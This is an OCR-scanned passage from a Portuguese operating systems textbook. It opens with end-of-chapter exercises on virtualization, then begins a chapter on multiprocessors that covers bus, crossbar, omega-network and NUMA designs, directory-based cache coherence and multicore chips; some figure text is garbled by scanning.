17. 


18. 


19. 


20. 


21. 


Nomeie dois tipos de instruções que são sensíveis no 
sentido de Popek e Goldberg. 

Nomeie três instruções de máquinas que não são sensi- 
veis no sentido de Popek e Goldberg. 

Qual é a diferença entre a virtualização completa e a 
paravirtualização? Qual você acha que é mais difícil de 
fazer? Explique sua resposta. 

Faz sentido paravirtualizar um sistema operacional se o 
código-fonte está disponível? E se ele não estiver? 
Considere um hipervisor tipo 1 que pode dar suporte a 
até n máquinas virtuais ao mesmo tempo. Os PCs podem 
ter um máximo de quatro partições primárias de discos. 
Será que n pode ser maior do que 4? Se afirmativo, onde 
os dados podem ser armazenados”? 

Explique brevemente o conceito de virtualização ao ni- 
vel do processo. 

Por que os hipervisores tipo 2 existem? Afinal, não há 
nada que eles possam fazer que os hipervisores tipo 1 
não possam, e os hipervisores tipo 1 são geralmente 
mais eficientes também. 

A virtualização é de algum uso para hipervisores 
tipo 2? 

Por que a tradução binária foi inventada? Você acredita 
que ela tem muito futuro? Explique a sua resposta. 
Explique como os quatro anéis de proteção do x86 po- 
dem ser usados para dar suporte à virtualização. 

Dê uma razão para que uma abordagem baseada em 
hardware usando CPUs habilitadas com VT possa ter 
um desempenho pior em comparação com as aborda- 
gens de software baseadas em tradução. 

Cite um caso em que um código traduzido possa ser 
mais rápido do que o código original, em um sistema 
usando tradução binária. 

O VMware realiza tradução binária um bloco de cada 
vez, então ele executa o bloco e começa a traduzir o se- 
guinte. Ele poderia traduzir o programa inteiro antecipa- 
damente e então executá-lo? Se afirmativo, quais são as 
vantagens e as desvantagens de cada técnica? 

Qual é a diferença entre um hipervisor puro e um micro- 
núcleo puro? 

Explane brevemente por que a memória é tão difícil de 
virtualizar bem na prática. Explique sua resposta. 
Executar múltiplas máquinas virtuais em um PC é algo 
que se sabe que exige grandes quantidades de memória. 
Por quê? Você conseguiria pensar em alguma maneira 
que reduzisse o uso de memória? Explique. 


22. 


23. 


24. 


25. 


26. 


2T: 


28. 


29. 
30. 


31. 


32. 


33. 


34. 


35. 


36. 


37. 


Explique o conceito das tabelas de páginas sombra, 
como usado na virtualização de memória. 

Uma maneira de lidar com sistemas operacionais hóspe- 
des que mudam suas tabelas de páginas usando instru- 
ções (não privilegiadas) ordinárias é marcar as tabelas 
de páginas como somente de leitura e gerar uma captura 
quando elas forem modificadas. De que outra maneira 
as tabelas de páginas sombra poderiam ser mantidas? 
Discuta a eficiência de sua abordagem vs. as tabelas de 
páginas somente de leitura. 

Por que os drivers de balão (balloon) são usados? Isso é 
uma trapaça? 

Descreva uma situação na qual drivers de balão não 
funcionam. 

Explique o conceito da deduplicação como usado na vir- 
tualização de memória. 

Computadores tinham DMA para realizar E/S por dé- 
cadas. Isso causou algum problema antes que houvesse 
MMUs de E/S? 

Cite uma vantagem da computação na nuvem sobre a 
execução dos seus programas localmente. Cite uma des- 
vantagem também. 

Dê um exemplo de IAAS, PAAS e SAAS. 

Por que uma migração de máquina virtual é importante? 
Em quais circunstâncias isso poderia ser útil? 

Migrar máquinas virtuais pode ser mais fácil do que 
migrar processos, mas a migração ainda assim pode ser 
difícil. Quais problemas podem surgir quando migrando 
uma máquina virtual? 

Por que a migração de máquinas virtuais de uma máqui- 
na para outra é mais fácil do que migrar processos de 
uma máquina para outra? 

Qual é a diferença entre a migração viva e a de outro tipo 
(migração morta)? 

Quais são as três principais exigências consideradas 
quando se projetou o VMware? 

Por que o número enorme de dispositivos periféricos 
disponíveis era um problema quando o VMware Work- 
station foi introduzido pela primeira vez? 

VMware ESXi foi feito muito pequeno. Por quê? Afinal 
de contas, servidores nos centros de processamento de 
dados normalmente têm dezenas de gigabytes de RAM. 
Que diferença algumas dezenas de megabytes a mais ou 
a menos fazem? 

Faça uma pesquisa na internet para encontrar dois exem- 
plos na vida real de aplicações virtuais. 


CAPÍTULO 


esde sua origem, a indústria dos computadores foi 

impulsionada por uma busca interminável por mais 

e mais potência computacional. O ENIAC podia 

desempenhar 300 operações por segundo, facil- 

mente 1.000 vezes mais rápido do que qualquer 
calculadora antes dele; no entanto, as pessoas não esta- 
vam satisfeitas com isso. Hoje temos máquinas milhões 
de vezes mais rápidas que o ENIAC e ainda assim há 
uma demanda por mais potência. Astrônomos estão ten- 
tando dar um sentido ao universo, biólogos estão ten- 
tando compreender as implicações do genoma humano 
e engenheiros aeronáuticos estão interessados em cons- 
truir aeronaves mais seguras e mais eficientes, e todos 
querem mais ciclos de CPU. Não importa quanta potên- 
cia computacional exista, ela nunca será suficiente. 

No passado, a solução era sempre fazer o relógio 
do processador executar mais rápido. Infelizmente, 
começamos a atingir alguns limites fundamentais na 
velocidade do relógio. De acordo com a teoria espe- 
cial da relatividade de Einstein, nenhum sinal elétrico 
pode propagar-se mais rápido do que a velocidade da 
luz, que é de cerca de 30 cm/ns no vácuo e mais ou 
menos 20 cm/ns em um fio de cobre ou fibra ótica. 
Isso significa que em um computador com um relógio 
de 10 GHz, os sinais não podem viajar mais do que 2 
cm no total. Para um computador de 100 GHz o total 
do comprimento do caminho é no máximo 2 mm. Um 
computador de 1 THz (1.000 GHz) terá de ser menor 
do que 100 mícrones, apenas para deixar o sinal trafe- 
gar de uma extremidade a outra — e voltar —, dentro 
de um ciclo do relógio. 

Fazer computadores tão pequenos assim pode ser 
viável, mas então atingimos outro problema funda- 
mental: a dissipação do calor. Quanto mais rápido um 





computador executa, mais calor ele gera, e quanto me- 
nor o computador, mais difícil é se livrar desse calor. 
Nos sistemas x86 de última geração, a ventoinha (cooler) 
da CPU é maior do que a própria CPU. De modo geral, 
ir de 1 MHz para 1 GHz exigiu apenas melhorias incre- 
mentais de engenharia do processo de fabricação dos 
chips. Ir de 1 GHz para 1 THz exigirá uma abordagem 
radicalmente diferente. 

Um meio de aumentar a velocidade é com com- 
putadores altamente paralelos. Essas máquinas con- 
sistem em muitas CPUs, cada uma delas executando 
a uma velocidade “normal” (não importa o que isso 
possa significar em um dado ano), mas que coletiva- 
mente tenham muito mais potência computacional do 
que uma única CPU. Sistemas com dezenas de milha- 
res de CPUs estão comercialmente disponíveis hoje. 
Sistemas com | milhão de CPUs já estão sendo cons- 
truídos no laboratório (FURBER et al., 2013). Embora 
existam outras abordagens potenciais para uma maior 
velocidade, como computadores biológicos, neste ca- 
pítulo nos concentraremos em sistemas com múltiplas 
CPUs convencionais. 

Computadores altamente paralelos são usados com 
frequência para processamento pesado de computações 
numéricas. Problemas como prever o clima, modelar o 
fluxo de ar em torno da asa de uma aeronave, simu- 
lar a economia mundial ou compreender interações de 
receptores de drogas no cérebro são atividades com- 
putacionalmente intensivas. Suas soluções exigem lon- 
gas execuções em muitas CPUs ao mesmo tempo. Os 
sistemas com múltiplos processadores discutidos nes- 
te capítulo são amplamente usados para esses e outros 
problemas similares na ciência e engenharia, entre ou- 
tras áreas. 
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Outro desenvolvimento relevante é o crescimento 
incrivelmente rápido da internet. Ela foi originalmente 
projetada como um protótipo para um sistema de con- 
trole militar tolerante a falhas, então tornou-se popular 
entre cientistas de computação acadêmicos, e há muito 
tempo adquiriu diversos usos novos. Um desses usos é 
conectar milhares de computadores mundo afora para 
trabalharem juntos em grandes problemas científicos. 
De certa maneira, um sistema consistindo em 1.000 
computadores disseminados mundo afora não é diferen- 
te de um sistema consistindo em 1.000 computadores 
em uma única sala, embora os atrasos de comunicação 
e outras características técnicas sejam diferentes. Tam- 
bém consideraremos esses sistemas neste capítulo. 

Colocar 1 milhão de computadores não relacionados 
em uma sala é algo fácil de se fazer desde que você tenha 
dinheiro suficiente e uma sala grande o bastante. Espa- 
lhar 1 milhão de computadores não relacionados mundo 
afora é mais fácil ainda, pois resolve o segundo proble- 
ma. A dificuldade surge quando você quer que eles se 
comuniquem entre si para trabalhar juntos em um único 
problema. Em consequência, muito trabalho foi investido 
na tecnologia de interconexão, e diferentes tecnologias 
de interconexão levaram a tipos de sistemas qualitativa- 
mente distintos e diferentes organizações de software. 

Toda a comunicação entre os componentes eletrô- 
nicos (ou óticos) em última análise resume-se a enviar 
mensagens — cadeias de bits bem definidas — entre 
eles. As diferenças encontram-se na escala de tempo, 
escala de distância e organização lógica envolvida. 
Em um extremo encontram-se os multiprocessadores 
de memória compartilhada, nos quais algo entre duas 
e 1.000 CPUs se comunicam via uma memória com- 
partilhada. Nesse modelo, toda CPU tem acesso igual 
a toda a memória física e pode ler e escrever palavras 
individuais usando instruções LOAD e STORE. Aces- 
sar uma palavra de memória normalmente leva de 1-10 


ns. Como veremos, atualmente é comum colocar mais 
do que um núcleo de processamento em um único chip 
de CPU, com os núcleos compartilhando acesso à me- 
mória principal (e às vezes até compartilhando caches). 
Em outras palavras, o modelo de múltiplos computado- 
res de memória compartilhada pode ser implementado 
usando CPUs fisicamente separadas, múltiplos núcleos 
em uma única CPU, ou uma combinação desses fato- 
res. Embora esse modelo, ilustrado na Figura 8.1(a), soe 
simples, implementá-lo na verdade não é tão simples 
assim e costuma envolver uma considerável troca de 
mensagens por baixo do pano, como explicaremos em 
breve. No entanto, essa troca de mensagens é invisível 
aos programadores. 

Em seguida vem o sistema da Figura 8.1(b) na qual 
os pares de CPU-memória estão conectados por uma 
interconexão de alta velocidade. Esse tipo de sistema 
é chamado de multicomputador de troca de mensagens. 
Cada memória é local a uma única CPU e pode ser aces- 
sada somente por aquela CPU. As CPUs comunicam-se 
enviando múltiplas mensagens via interconexão. Com 
uma boa interconexão, uma mensagem curta pode ser 
enviada em 10-50 us, que ainda assim é um tempo mui- 
to mais longo do que o tempo de acesso da memória na 
Figura 8.1 (a). Não ha uma memória global compartilha- 
da nesse projeto. Multicomputadores (isto é, sistemas 
de trocas de mensagens) são muito mais fáceis de cons- 
truir do que multiprocessadores (de memória comparti- 
lhada), mas eles são mais difíceis de programar. Desse 
modo, cada gênero tem seus fãs. 

O terceiro modelo, que está ilustrado na Figura 8.1(c), 
conecta sistemas de computadores completos via uma 
rede de longa distância, como a internet, para formar 
um sistema distribuído. Cada um desses tem sua própria 
memória e os sistemas comunicam-se por troca de men- 
sagens. A única diferença real entre a Figura 8.1(b) e a Fi- 
gura 8.1(c) é que, na segunda, computadores completos 
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são usados e os tempos das mensagens são muitas vezes 
10-100 ms. Esse longo atraso força esses sistemas fraca- 
mente acoplados a serem usados de maneiras diferentes 
das dos sistemas fortemente acoplados da Figura 8.1(b). 
Os três tipos de sistemas diferem em seus atrasos por algo 
em torno de três ordens de magnitude. Essa é a diferença 
entre um dia e três anos. 

Este capítulo tem três seções principais, corres- 
pondendo a cada um dos três modelos da Figura 8.1. 
Em cada modelo discutido aqui, começamos com uma 
breve introdução para o hardware relevante. Então se- 
guimos para o software, especialmente as questões do 
sistema operacional para aquele tipo de sistema. Como 
veremos, em cada caso, diferentes questões estão pre- 
sentes e diferentes abordagens são necessárias. 


8.1 Multiprocessadores 


Um multiprocessador de memória compartilhada 
(ou simplesmente um multiprocessador de agora em dian- 
te) é um sistema de computadores no qual duas ou mais 
CPUs compartilham acesso total a uma RAM comum. Um 
programa executando em qualquer uma das CPUs vê um 
espaço de endereçamento virtual normal (geralmente pagi- 
nado). A única propriedade incomum que esse sistema tem 
é que a CPU pode escrever algum valor em uma palavra de 
memória e então ler a palavra de volta e receber um valor 
diferente (porque outra CPU o alterou). Quando organi- 
zada corretamente, essa propriedade forma a base da co- 
municação entre processadores: uma CPU escreve alguns 
dados na memória e outra lê esses dados. 

Na maioria dos casos, sistemas operacionais de mul- 
tiprocessadores são sistemas operacionais normais. Eles 
lidam com chamadas de sistema, realizam gerenciamento 
de memória, fornecem um sistema de arquivos e geren- 
ciam dispositivos de E/S. Mesmo assim, existem algumas 
áreas nas quais eles possuem características especiais. 
Elas incluem a sincronização de processos, gerencia- 
mento de recursos e escalonamento. A seguir, primeiro 
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examinaremos brevemente o hardware de multiproces- 
sadores e então prosseguiremos para essas questões dos 
sistemas operacionais. 


8.1.1 Hardware de multiprocessador 


Embora todos os multiprocessadores tenham a pro- 
priedade de que cada CPU pode endereçar toda a me- 
mória, alguns multiprocessadores têm a propriedade 
adicional de que cada palavra de memória pode ser lida 
tão rapidamente quanto qualquer outra palavra de memó- 
ria. Essas máquinas são chamadas de multiprocessadores 
UMA (Uniform Memory Access — acesso uniforme à 
memória). Em comparação, multiprocessadores NUMA 
(Nonuniform Memory Access — acesso não uniforme 
à memória) não têm essa propriedade. Por que essa dife- 
rença existe tornar-se-á claro mais tarde. Examinaremos 
primeiro os multiprocessadores UMA e então seguire- 
mos para os multiprocessadores NUMA. 


Multiprocessadores UMA com arquiteturas 
baseadas em barramento 


Os multiprocessadores mais simples são baseados 
em um único barramento, como ilustrado na Figura 
8.2(a). Duas ou mais CPUs e um ou mais módulos de 
memória usam o mesmo barramento para comunicação. 
Quando uma CPU quer ler uma palavra de memória, ela 
primeiro confere para ver se o barramento está ocupado. 
Se o barramento estiver ocioso, a CPU coloca o endere- 
ço da palavra que ela quer no barramento, envia alguns 
sinais de controle e espera até que a memória coloque a 
palavra desejada no barramento. 

Se o barramento estiver ocupado quando uma CPU 
quiser ler ou escrever memória, a CPU simplesmente es- 
pera até que o barramento se torne ocioso. Aqui se encon- 
tra o problema com esse projeto. Com duas ou três CPUs, 
a contenção para o barramento será gerenciável; com 
32 ou 64 será insuportável. O sistema será totalmente 


ale tE:FA Três multiprocessadores baseados em barramentos. (a) Sem a utilização de cache. (b) Com a utilização de cache. (c) Com 


a utilização de cache e memórias privadas. 
Memória compartilhada 
a 


Barramento 


(a) (b) 


Memória privada 





Memória 
compartilhada 


Es | 
EE 


360) | SISTEMAS OPERACIONAIS MODERNOS 


limitado pela largura de banda do barramento, e a maioria 
das CPUs ficará ociosa a maior parte do tempo. 

A solução para esse problema é adicionar uma cache 
para cada CPU, como descrito na Figura 8.2(b). A cache 
pode estar dentro ou ao lado do chip da CPU, na placa 
do processador, ou alguma combinação de todas as três 
possibilidades. Como muitas leituras podem agora ser 
satisfeitas a partir da cache local, haverá muito menos 
tráfego de barramento, e o sistema poderá suportar mais 
CPUs. Em geral, a utilização de cache não é feita pala- 
vra por palavra, mas em uma base de blocos de 32 ou 64 
bytes. Quando uma palavra é referenciada, o seu bloco 
inteiro, chamado de linha de cache, é trazido para a 
cache da CPU que a referenciou. 

Cada bloco de cache é marcado como somente de 
leitura (nesse caso, ele pode estar presente em múltiplas 
caches ao mesmo tempo) ou de leitura-escrita (nesse 
caso, ele não pode estar presente em nenhuma outra ca- 
che). Se uma CPU tenta escrever uma palavra que está 
em uma ou mais caches remotas, o hardware do bar- 
ramento detecta a palavra e coloca um sinal no barra- 
mento informando todas as outras caches a respeito da 
escrita. Se outras caches têm uma cópia “limpa”, isto é, 
uma cópia exata do que está na memória, elas podem 
apenas descartar suas cópias e deixar que o escritor bus- 
que o bloco da cache da memória antes de modificá-lo. 
Se alguma outra cache tem uma cópia “suja” (isto é, 
modificada), ela deve escrever de volta para a memória 


antes que a escrita possa proceder ou transferi-la direta- 
mente para o escritor pelo barramento. Esse conjunto de 
regras é chamado de protocolo de coerência de cache e 
é um entre muitos que existem. 

Outra possibilidade ainda é o projeto da Figura 8.2(c), 
no qual cada CPU não tem apenas uma cache, mas tam- 
bém uma memória local, privada, que ela acessa por um 
barramento (privado) dedicado. Para usar essa configura- 
ção de maneira otimizada, o compilador deve colocar nas 
memórias privadas todo o código do programa, cadeias 
de caracteres, constantes e outros dados somente de lei- 
tura, pilhas e variáveis locais. A memória compartilhada 
é usada então somente para variáveis compartilhadas que 
podem ser escritas. Na maioria dos casos, essa colocação 
cuidadosa reduzirá em muito o tráfego de barramento, 
mas exige uma cooperação ativa do compilador. 


Multiprocessadores UMA que usam barramentos 
cruzados 


Mesmo com o melhor sistema de cache, o uso de um 
único barramento limita o tamanho de um multiproces- 
sador UMA para cerca de 16 ou 32 CPUs. Para ir além 
disso, é necessário um tipo diferente de rede de interco- 
nexão. O circuito mais simples para conectar n CPUs a 
k memórias é o barramento cruzado (crossbar switch), 
mostrado na Figura 8.3. Barramentos cruzados foram 
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usados por décadas em sistemas de comutação telefôni- 
ca para conectar um grupo de linhas de entrada com um 
conjunto de linhas de saída de uma maneira arbitrária. 

Em cada interseção de uma linha horizontal (que 
chega) e uma linha vertical (que sai) há uma interseção 
(crosspoint). Uma interseção é uma pequena chave ele- 
trônica que pode ser aberta ou fechada eletronicamente, 
dependendo de as linhas horizontais e verticais estarem 
conectadas ou não. Na Figura 8.3(a) vemos três inter- 
seções fechadas simultaneamente, permitindo conexões 
entre os pares CPU-memória (010, 000), (101, 101) e 
(110, 010) ao mesmo tempo. Muitas outras combina- 
ções também são possíveis. Na realidade, o número de 
combinações é igual ao número de diferentes possibili- 
dades de oito torres poderem ser colocadas seguramente 
em um tabuleiro de xadrez. 

Uma das melhores propriedades do barramento cru- 
zado é que ele é uma rede não bloqueante, significa 
que nenhuma CPU tem negada a conexão da qual ela 
precisa porque alguma interseção ou linha já está ocu- 
pada (presumindo que o módulo da memória em si está 
disponível). Nem todas as interconexões têm essa bela 
propriedade. Além disso, nenhum planejamento anteci- 
pado é necessário. Mesmo que sete conexões arbitrárias 
ja estejam estabelecidas, sempre é possível conectar a 
CPU restante à memória restante. 

A contenção de memória ainda é possível, claro, se 
duas CPUs quiserem acessar o mesmo módulo ao mes- 
mo tempo. Mesmo assim, ao dividir a memória em n 
unidades, a contenção é reduzida por um fator de n em 
comparação com o modelo da Figura 8.2. 

Uma das piores propriedades da chave de crossbar é 
o fato de o número de interseções crescer como n?. Com 
1.000 CPUs e 1.000 módulos de memória precisamos 
de um milhão de interseções. Um barramento cruzado 
de tal tamanho não é executável. Mesmo assim, para 
sistemas de tamanho médio, um projeto de barramento 
cruzado é funcional. 


Multiprocessadores UMA usando redes de 
comutação multiestágio 


Um projeto de multiprocessador completamente di- 
ferente é baseado no comutador (switch) 2 x 2 simples 
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mostrado na Figura 8.4(a). Esse comutador tem duas en- 
tradas e duas saídas. Mensagens chegando de qualquer 
linha de entrada podem ser comutadas para qualquer li- 
nha de saída. Para nossos fins, as mensagens conterão 
até quatro partes, como mostrado na Figura 8.4(b). O 
campo Módulo diz qual memória usar. O Endereço espe- 
cifica um endereço dentro de um módulo. O CódigoOp 
fornece a operação, como READ ou WRITE. Por fim, o 
campo opcional Valor pode conter um operando, como 
uma palavra de 32 bits para ser escrita em um WRITE. O 
comutador inspeciona o campo Módulo e o utiliza para 
determinar se a mensagem deve ser enviada em X ou Y. 

Nossos comutadores 2 x 2 podem ser arranjados de 
muitos modos para construir redes de comutação mul- 
tiestágio maiores (ADAMS et al., 1987; GAROFA- 
LAKIS e STERGIOU, 2013; KUMAR e REDDY, 1987). 
Uma possibilidade é a rede ômega, simples e econômi- 
ca, ilustrada na Figura 8.5, nela conectamos oito CPUs 
a oito memórias usando 12 chaves. De modo geral, para 
n CPUs e n memórias precisariamos de log, n estágios, 
com n/2 comutadores por estágio, para um total de (n/2) 
log, n comutadores, o que é muito melhor do que n? inter- 
seções, especialmente para grandes valores de n. 

O padrão de conexões da rede ômega é muitas vezes 
chamado de embaralhamento perfeito, tendo em vis- 
ta que a mistura dos sinais em cada estágio lembra um 
baralho de cartas sendo cortado na metade e então mis- 
turado carta por carta. Para ver como a rede ômega fun- 
ciona, suponha que a CPU 011 queira ler uma palavra 
do módulo de memória 110. A CPU envia uma mensa- 
gem READ para o comutador 1D contendo o valor 110 
no campo Módulo. O comutador toma o primeiro bit 
(isto é, o mais à esquerda) de 110 e o usa para o rotea- 
mento. Um 0 roteia para a saída superior e um | roteia 
para a inferior. Como esse bit é um 1, a mensagem é 
roteada pela saída inferior para 2D. 

Todos os comutadores do segundo estágio, incluindo 
2D, usam o segundo bit para roteamento. Esse, também, 
é um 1, então agora a mensagem é passada adiante via 
saída inferior para 3D. Aqui o terceiro bit é testado e 
vê-se que é 0. Em consequência, a mensagem sai pela 
saída superior e chega à memória 110, como desejado. 
O caminho seguido por essa mensagem é marcado na 
Figura 8.5 pela letra a. 


alelo E:Z (a) Um comutador 2 x 2 com duas linhas de entrada, A e B, e duas linhas de saída, Xe Y. (b) O formato de uma mensagem. 


E 


(a) 


(b) 


ES | SISTEMAS OPERACIONAIS MODERNOS 


eltt: Uma rede de comutação ômega. 


3 estágios 
A 





JEGEE 
Tater 
SZ 
i 
el B 
sã 
TALS 
el [S| 
EE EaE 


Memórias 


0 


= 
oO 
a 


k =s 
ak =e 
= oO 
=à 
Õ 
No 
Õ 
oo 
(=, 

w 
=a = 
=a = 
= oO 


A medida que a mensagem se desloca pela rede de 
comutação, os bits à esquerda do número do módulo 
não são mais necessários. Eles podem ser bem utiliza- 
dos para registrar o número da linha de entrada ali, para 
que a resposta encontre seu caminho de volta. Para o 
caminho a, as linhas de entrada são O (entrada superior 
para 1D), 1 (entrada inferior para 2D) e 1 (entrada in- 
ferior para 3D), respectivamente. A resposta é roteada 
de volta usando 011, apenas lendo-a da direita para a 
esquerda dessa vez. 

Ao mesmo tempo em que tudo isso está ocorrendo, 
a CPU 001 quer escrever uma palavra para o módulo de 
memória 001. Um processo análogo acontece aqui, com 
a mensagem roteada pelas saídas superior, superior e in- 
ferior, respectivamente, marcadas pela letra b. Quando 
ela chega, o seu campo Módulo lê 001, representando o 
caminho que ela tomou. Como essas duas solicitações 
não usam nenhum dos mesmos comutadores, linhas, ou 
módulos de memória, elas podem proceder em paralelo. 

Agora considere o que aconteceria se a CPU 000 qui- 
sesse simultaneamente acessar o módulo de memória 
000. A solicitação entraria em conflito com a da CPU 001 
na chave 3A, uma delas teria então de esperar. Diferente- 
mente do barramento cruzado, a rede ômega é uma rede 
bloqueante. Nem todo conjunto de solicitações pode ser 
processado simultaneamente. Conflitos podem ocorrer 
sobre o uso de um fio ou um comutador, assim como en- 
tre solicitações para a memória e respostas da memória. 

Tendo em vista que é altamente desejável disseminar 
as referências de memória de maneira uniforme através 
dos módulos, uma técnica comum é usar os bits de bai- 
xa ordem como o número do módulo. Considere, por 
exemplo, um espaço de endereçamento orientado por 
bytes para um computador que, na maioria das vezes, 
acessa palavras de 32 bits completas. Os 2 bits de baixa 


ordem serão em geral 00, mas os 3 bits seguintes se- 
rão uniformemente distribuídos. Ao usar esses 3 bits 
como o número de módulo, as palavras endereçadas 
consecutivamente estarão em módulos consecutivos. 
Um sistema de memória no qual palavras consecutivas 
estão em módulos diferentes é chamado de entrelaça- 
do. Memórias entrelaçadas maximizam o paralelismo 
porque a maioria das referências de memória é para en- 
dereços consecutivos. Também é possível projetar redes 
de comutação que sejam não bloqueantes e ofereçam 
múltiplos caminhos de cada CPU para cada módulo de 
memória a fim de distribuir melhor o tráfego. 


Multiprocessadores NUMA 


Multiprocessadores UMA de barramento único são 
geralmente limitados a não mais do que algumas dúzias 
de CPUs, e multiprocessadores com barramento cruza- 
do ou redes de comutação precisam de muito hardware 
(caro) e não são tão maiores assim. Para conseguir mais 
do que 100 CPUs, algo tem de ceder. Em geral, o que 
cede é a ideia de que todos os módulos de memória te- 
nham o mesmo tempo de acesso. Essa concessão leva à 
ideia de multiprocessadores NUMA, como menciona- 
do. De maneira semelhante aos seus primos UMA, eles 
fornecem um espaço de endereçamento único através 
de todas as CPUs, mas diferentemente das máquinas 
UMA, o acesso aos módulos de memória locais é mais 
rápido do que o acesso aos módulos remotos. Desse 
modo, todos os programas UMA executarão sem mu- 
dança em máquinas NUMA, mas o desempenho será 
pior do que em uma máquina UMA. 

Máquinas NUMA têm três características fundamen- 
tais que todas elas possuem e que juntas as distinguem 
de outros multiprocessadores: 


1. Há um único espaço de endereçamento visível 
para todas as CPUs. 

2. O acesso à memória remota é feito por instruções 
LOAD e STORE. 

3. O acesso à memória remota é mais lento do que o 
acesso à memória local. 


Quando o tempo de acesso à memória remota não é 
escondido (porque não há utilização de cache), o siste- 
ma é chamado de NC-NUMA (Non Cache-coherent 
NUMA — NUMA sem cache coerente). Quando as 
caches são coerentes, o sistema é chamado de CC-NU- 
MA (Cache-Coherent NUMA — NUMA com cache 
coerente). 

Uma abordagem popular na construção de grandes 
multiprocessadores CC-NUMA é o multiprocessador 
baseado em diretórios. A ideia é manter um banco de 
dados dizendo onde está cada linha de cache e qual é o 
seu status. Quando uma linha de cache é referenciada, 
o banco de dados é questionado para descobrir onde ela 
está e se está limpa ou suja. Como esse banco de dados é 
questionado sobre cada instrução que toque a memória, 
ele tem de ser armazenado em um hardware de propó- 
sito especial extremamente rápido que pode responder 
em uma fração de um ciclo de barramento. 

Para tornar a ideia de um multiprocessador basea- 
do em diretório de certa maneira mais concreto, vamos 
considerar um exemplo simples (hipotético), um siste- 
ma de 256 nós, cada qual consistindo em uma CPU e 
16 MB de RAM conectados à CPU por um barramento 
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local. A memória total é 2” bytes e ela está dividida em 
até 2% linhas de cache de 64 bytes cada. A memória está 
alocada estaticamente entre os nós, com 0-16M no nó 0, 
16M-32M no nó 1 etc. Os nós estão conectados por uma 
rede de interconexão, como mostrado na Figura 8.6(a). 
Cada nó também detém as entradas do diretório para 
as 2!8 linhas de cache de 64 bytes compreendendo sua 
memória de 2* bytes. Por ora, presumiremos que uma 
linha pode estar contida em, no máximo, uma cache. 

Para ver como funciona o diretório, vamos observar 
uma instrução LOAD da CPU 20 que referencia uma li- 
nha na cache. Primeiro, a CPU que emite a instrução a 
apresenta para sua MMU, que a traduz para um ende- 
reco físico, digamos, 0x24000108. A MMU divide esse 
endereço nas três partes mostradas na Figura 8.6(b). Em 
decimais, as três partes são nó 36, linha 4 e deslocamen- 
to 8. A MMU vê que a palavra de memória referenciada 
é do nó 36, não do nó 20, então ela envia uma mensa- 
gem de solicitação através da rede de interconexão para 
o nó hospedeiro da linha, 36, perguntando se a sua linha 
4 está armazenada em cache e, se sim, onde. 

Quando a solicitação chega ao nó 36 pela rede de in- 
terconexão, ela é roteada para o hardware do diretório. 
O hardware indexa em sua tabela de 2!8 entradas, uma 
para cada uma de suas linhas em cache, e extrai a en- 
trada 4. Na Figura 8.6(c) vemos que a linha não está ar- 
mazenada em cache, então o hardware emite uma busca 
para a linha 4 da RAM local e após ela chegar, envia-a 
de volta para o nó 20. Ele então atualiza a entrada 4 do 
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diretório para indicar que a linha está agora armazenada 
em cache no nó 20. 

Vamos agora considerar uma segunda solicitação, des- 
sa vez perguntando a respeito da linha 2 do nó 36. A partir 
da Figura 8.6(c), vemos que essa linha está armazenada 
em cache no nó 82. A essa altura, o hardware poderia atua- 
lizar a entrada 2 do diretório para dizer qual linha está 
agora no nó 20 e então enviar uma mensagem para o nó 
82 instruindo-a para passar a linha para o nó 20 e invalidar 
a sua cache. Observe que mesmo em um chamado “multi- 
processador de memória compartilhada” tem muita troca 
de mensagens ocorrendo por baixo do pano. 

Como uma rápida nota, vamos calcular quanta me- 
mória está sendo tomada pelos diretórios. Cada nó tem 
16 MB de RAM e 2" entradas de 9 bits para manter o 
controle dessa RAM. Desse modo, a sobrecarga do dire- 
tório é de cerca de 9 x 2'8 bits divididos por 16 MB, mais 
ou menos 1,76%, o que é geralmente aceitável (embora 
tenha de ser uma memória de alta velocidade, o que au- 
menta o seu custo, é claro). Mesmo com linhas de cache 
de 32 bytes, a sobrecarga seria de somente 4%. Com li- 
nhas de cache de 128 bytes, ela seria de menos de 1%. 

Uma limitação óbvia desse projeto é que uma linha 
pode ser armazenada em cache em somente um nó. Para 
permitir que as linhas sejam armazenadas em cache em 
múltiplos nós, precisaríamos, por exemplo, de alguma 
maneira de localizar todas elas, a fim de invalidá-las ou 
atualizá-las em uma escrita. Em muitos processadores 
de múltiplos núcleos, uma entrada de diretório, portan- 
to, consiste em um vetor de bits com um bit por núcleo. 
Um “1” indica que a linha de cache está presente no 
núcleo, e um “0”, que ela não está. Além disso, cada 
entrada de diretório contém tipicamente alguns bits a 
mais. Como consequência, o custo de memória do dire- 
tório aumenta consideravelmente. 


Chips multinucleo 


Com o avanço da tecnologia de fabricação de chips, 
os transistores estão ficando cada dia menores, e é pos- 
sível colocar mais e mais deles em um chip. Essa ob- 
servação empírica é muitas vezes chamada de Lei de 
Moore, em homenagem ao cofundador da Intel, Gordon 
Moore, que a observou pela primeira vez. Em 1974, o 
Intel 8080 continha um pouco mais de 2.000 transisto- 
res, enquanto as CPUs do Xeon Nehalem-EX têm mais 
de 2 bilhões de transistores. 

Uma questão óbvia é: “O que você faz com todos 
esses transistores?”. Como discutimos na Seção 1.3.1, 
uma opção é adicionar megabytes de cache ao chip. 
Essa opção é séria, e chips com 4-32 de MB de cache 


on-chip são comuns. Mas em algum momento, aumen- 
tar o tamanho da cache pode elevar a taxa de acertos 
somente de 99% para 99,5%, o que não melhora muito 
o desempenho da aplicação. 

A outra opção é colocar duas ou mais CPUs comple- 
tas, normalmente chamadas de núcleos, no mesmo chip 
(tecnicamente, na mesma pastilha). Chips com dois, 
quatro e oito núcleos já são comuns; e você pode até 
comprar chips com centenas de núcleos. Não há dúvida 
de que mais núcleos estão a caminho. Caches ainda são 
cruciais e estão agora espalhadas pelo chip. Por exem- 
plo, o Xeon 2651 da Intel tem 12 núcleos físicos hyper- 
threaded, proporcionando 24 núcleos virtuais. Cada um 
dos 12 núcleos físicos tem 32 KB de cache de instrução 
L1 e 32 KB de cache de dados L1. Cada um também 
tem 256 KB de cache L2. Por fim, os 12 núcleos com- 
partilham 30 MB de cache L3. 

Embora as CPUs possam ou não compartilhar caches 
(ver, por exemplo, Figura 1.8), elas sempre comparti- 
lham a memória principal, e essa memória é consistente 
no sentido de que há sempre um valor único para cada 
palavra de memória. Circuitos de hardware especiais 
certificam-se de que se uma palavra está presente em 
duas ou mais caches e uma das CPUs modifica a pala- 
vra, ela é automática e atomicamente removida de todas 
as caches a fim de manter a consistência. Esse processo 
é conhecido como snooping (espionagem). 

O resultado desse projeto é que chips multinúcleo são 
simplesmente multiprocessadores muito pequenos. Na 
realidade, esses chips são chamados às vezes de CMPs 
